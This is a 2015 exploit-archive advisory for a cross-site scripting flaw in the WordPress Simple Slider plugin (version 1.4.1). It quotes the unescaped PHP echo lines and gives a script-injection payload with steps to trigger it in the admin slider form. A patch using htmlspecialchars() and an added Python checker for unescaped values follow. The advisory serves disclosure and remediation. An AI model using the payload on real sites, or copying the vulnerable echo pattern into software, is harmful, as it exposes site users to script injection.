WordPress WP Slider Plugin Cross Site Scripting

2015-08-19
ID: 81233
CVE: None
Download vulnerable application: None
######################
# Exploit Title : 
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/simple-slider-ssp/
# Date: 2015-08-18
# Tested On : Windows - Firefox
# Software Link :
https://downloads.wordpress.org/plugin/simple-slider-ssp.1.4.zip
# Version : 1.4.1
######################
# Vulnerable File :
views/options_meta_box.php (Edit and Add Slider)

######################
# Vulnerable Codes :
108: <input type="text" style='width: 80%' name="slider_options[height]" value="<?php echo $slider_options['height'] ?>"  />
142: <input type="text" style='width: 80%' name="slider_options[width]" value="<?php echo $slider_options['width'] ?>" />
192: <input type="text" style="width: 80%" name="slider_options[cycle_speed]" value="<?php echo $slider_options['cycle_speed'];  ?>" /> <?php _e( 'Seconds', 'ssp' ); ?>
211: <input type="text" style="width: 80%" name="slider_options[animation_speed]" value="<?php echo $slider_options['animation_speed'];  ?>" /> <?php _e( 'Seconds', 'ssp' ); ?>

######################
# Exploit :
To test the cross-site scripting, this code can be used in all of the above inputs:
"><script>alert(/xss/)</script><
1- http://localhost/pentest/wordpress/wp-admin/edit.php?post_type=ssp_slider (add new)
2- Complete the Height, Width, Cycle speed and Animation speed fields with the above code.
3- Click on create slider
4- Boom (xss alerts) :)
######################
# Patch:
To fix this vulnerability, use the htmlspecialchars() function when echoing each value:
<input type="text" style='width: 80%' name="slider_options[height]" value="<?php echo htmlspecialchars($slider_options['height']) ?>"  />
Apply the same change to the other lines, too.
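
To find the other lines that still need this change, a check like the following can be run over the view file. It is an added example, not part of the original advisory or the plugin; it is a regex heuristic rather than a PHP parser, the function and constant names are hypothetical, and the sample input is constructed from the lines quoted above.

```python
import re

# Calls treated as safe for an HTML attribute value: htmlspecialchars() is the
# fix given above; esc_attr()/esc_html()/absint() are WordPress helpers and
# intval()/floatval() are PHP built-ins that force a numeric value.
SAFE_CALLS = ("htmlspecialchars", "esc_attr", "esc_html", "absint", "intval", "floatval")
SAFE_PREFIX = re.compile(r"(?:%s)\s*\(" % "|".join(SAFE_CALLS))

# value="<?php echo EXPR ?>" (or <?= EXPR ?>), allowing line wraps in the tag.
ECHO_IN_VALUE = re.compile(
    r"""value\s*=\s*["']\s*<\?(?:php\s+echo|=)\s*(?P<expr>.*?)\s*;?\s*\?>""",
    re.IGNORECASE | re.DOTALL,
)


def find_unescaped_values(php_source):
    """Return [(line_number, expression)] for each value attribute that echoes
    a PHP expression not wrapped in one of SAFE_CALLS."""
    findings = []
    for match in ECHO_IN_VALUE.finditer(php_source):
        expr = match.group("expr")
        if not SAFE_PREFIX.match(expr):
            line_number = php_source.count("\n", 0, match.start()) + 1
            findings.append((line_number, expr))
    return findings


# Constructed sample: the height input already patched as shown above, the
# other three inputs still as listed under "Vulnerable Codes".
SAMPLE = '''<input type="text" style='width: 80%' name="slider_options[height]" value="<?php echo htmlspecialchars($slider_options['height']) ?>"  />
<input type="text" style='width: 80%' name="slider_options[width]"
value="<?php echo $slider_options['width'] ?>" />
<input type="text" style="width: 80%" name="slider_options[cycle_speed]" value="<?php echo $slider_options['cycle_speed'];  ?>" /> <?php _e( 'Seconds', 'ssp' ); ?>
<input type="text" style="width: 80%" name="slider_options[animation_speed]" value="<?php echo $slider_options['animation_speed'];  ?>" /> <?php _e( 'Seconds', 'ssp' ); ?>
'''

if __name__ == "__main__":
    for line_number, expr in find_unescaped_values(SAMPLE):
        print("line %d: unescaped echo of %s" % (line_number, expr))
```

The check only looks at how each expression begins, so anything it reports as clean should still be reviewed by hand.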
######################
# Discovered By : Ehsan Hosseini.
# Spc Tnx : H_SQLI.EMpiRe , Channel , Amir-Mahmod and All Ashiyane Members.
######################